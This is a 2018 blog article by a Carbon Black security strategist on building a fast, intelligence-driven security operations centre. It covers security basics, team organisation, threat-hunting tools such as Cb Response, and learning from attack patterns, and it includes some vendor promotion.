Article

Rick McElroy
Rick McElroy 30 April 2018
Categories

Building a High-Speed Security Operations Centre SOC

As a Security Strategist, I am aware that when an incident occurs, the speed of your response will dictate the extent to which you can minimise the impact. Every second counts, and while the clock is ticking, the cost of the breach is rapidly increasing.

Breaches that take over 30 days to contain cost companies an extra $1 million, and depending on the severity, it can cost even more. Minimising dwell time is the name of the game; the faster you can identify root cause, the faster you can remediate. So, how can you transform your security operations centre (SOC) into an intelligence-driven operation that can hunt for zero-day threats? Here I will talk about different components such as mastering security basics, organising your team effectively, and evolving your SOC with each new attack.

A highly efficient SOC enables its skilled defenders to harness both advanced automation and human insight to combat the ubiquitous threat of cybercrime. A high-speed SOC must excel in many different areas of security operations to ensure that valuable time is not handed over to the adversary. It is crucial for security professionals to understand that the ability to operate an agile, intelligence-driven SOC is dependent on your organisation’s answer to the following four questions:

What Are The Basics We Need To Master First?

Speed is only built on a strong security foundation. A process is only able to be automated once it has been perfected by your team. Automating a process that your team does not fully understand will create blind spots and likely decrease your visibility as you attempt to scale. Before tasking machines with processes that are key to your security, make sure you understand all the weaknesses of your current posture.

  1. Have you minimised your attack surface?
  2. Have you inventoried every asset?
  3. Are your systems being properly patched?
  4. How would you know if they were not?

Organisations must not only master the basics of security and achieve speed, but strive for complete visibility across their environment, and the continuous monitoring of every event.

How Can I Efficiently Organise And Lead The People On My Team?

Organising your team to protect your environment with agility is a difficult task with all the varied skills and challenges related to traditional SOC structures. Efficiency starts with breaking down the structures seen in traditional SOCs. Success can be found by moving beyond an operation that focuses solely on event analysis. Take the example of Red Canary, which has created amazing innovation within its security team and around the investigation process. Red Canary has included its Intel team in engineering efforts, engineers in analysis efforts, and so on. Rather than assigning each team member a label to exclusively focus on, each person has a core ‘practice.’ They still develop and improve within their practice, but they are also challenged to engage with other functions in the SOC.

How Can Technology Help Streamline Our Detection and Response Processes?

Technology can help you to proactively hunt threats across your enterprise, as well as rapidly drill down to the root cause of the threat, and ultimately reduce attack dwell time. Security professionals use technologies like Carbon Black’s Cb Response to validate their hunting hypotheses and create automated watchlists to generate custom alerts for suspicious patterns they identify.

In the case of malicious attacks, it can take over 9 months on average to properly identify the root cause of an incident and contain it. Cb Response allows analysts to visualise the complete attack kill chain and then respond and remediate the attack within minutes, without having to manually aggregate and sift through relevant raw data post-incident. It allows you to safely isolate an infected host and then obtain secure direct access to that endpoint to continue your investigation.

How Can My Entire SOC Evolve With Every New Attack?

In a Verizon report, 88% of breaches fell into one of nine patterns that had existed three years prior. Attackers know that legacy antivirus products can be easily bypassed by making slight changes to avoid being identified as “known bad.” However, utilising patterns of attack to connect the dots between IOCs and all other system events, SOC analysts and incident responders can gain a full understanding of the precise sequence of events as a cybercrime unfolds.

There is clear cause-and effect insight into where an attacker gained access, what he tried to accomplish, how he attempted exfiltration and, ultimately, what the exact root cause of the attack was. Without this contextual understanding of the attack, an incident responder would lack any additional insight into how the organisation could be better protected in the future.

Overall, with a high-speed SOC, your organisation can avoid addressing the same threats over and over. This means more time hunting new threats and less time constantly policing known areas of risk manually. The future SOC is not technology, per se; it is people, intelligence, and automation to allow for a rapid response to a threat.

雄貴 胡
雄貴 胡

seongkooi@Outlook.com

Please login or register to add a comment.

Contribute Now!

Loving our articles? Do you have an insightful post that you want to shout about? Well, you've come to the right place! We are always looking for fresh Doughnuts to be a part of our community.

Popular Articles

See all
Digital Marketing Vs. Traditional Marketing: Which One Is Better?

Digital Marketing Vs. Traditional Marketing: Which One Is Better?

What's the difference between digital marketing and traditional marketing, and why does it matter? The answers may surprise you.

Julie Cave
Julie Cave 14 July 2016
Read more
Top 10 B2B Platforms to Help your Business Grow Worldwide

Top 10 B2B Platforms to Help your Business Grow Worldwide

Although the trend of a Business to Business portal is not new but the evolution of technology has indeed changed the way they function. Additional digital trading features and branding has taken the place of...

Salman Sharif
Salman Sharif 7 July 2017
Read more
7 reasons why social media marketing is important for your business

7 reasons why social media marketing is important for your business

Social media is quickly becoming one of the most important aspects of digital marketing, which provides incredible benefits that help reach millions of customers worldwide. And if you are not applying this profitable...

Sharron Nelson
Sharron Nelson 6 February 2018
Read more
4 Important Digital Marketing Channels You Should Know About

4 Important Digital Marketing Channels You Should Know About

It goes without saying that a company can't do without digital marketing in today's world.

Digital Doughnut Contributor
Digital Doughnut Contributor 5 November 2014
Read more
Collection Of The Best Email Testing Tools Online

Collection Of The Best Email Testing Tools Online

Don’t be afraid of email testing. There are many free or freemium tools online that can help you with testing your SPAM score, deliverability and even the rendering of your email. We feature 30 email testing tools in...

Roland Pokornyik
Roland Pokornyik 31 October 2016
Read more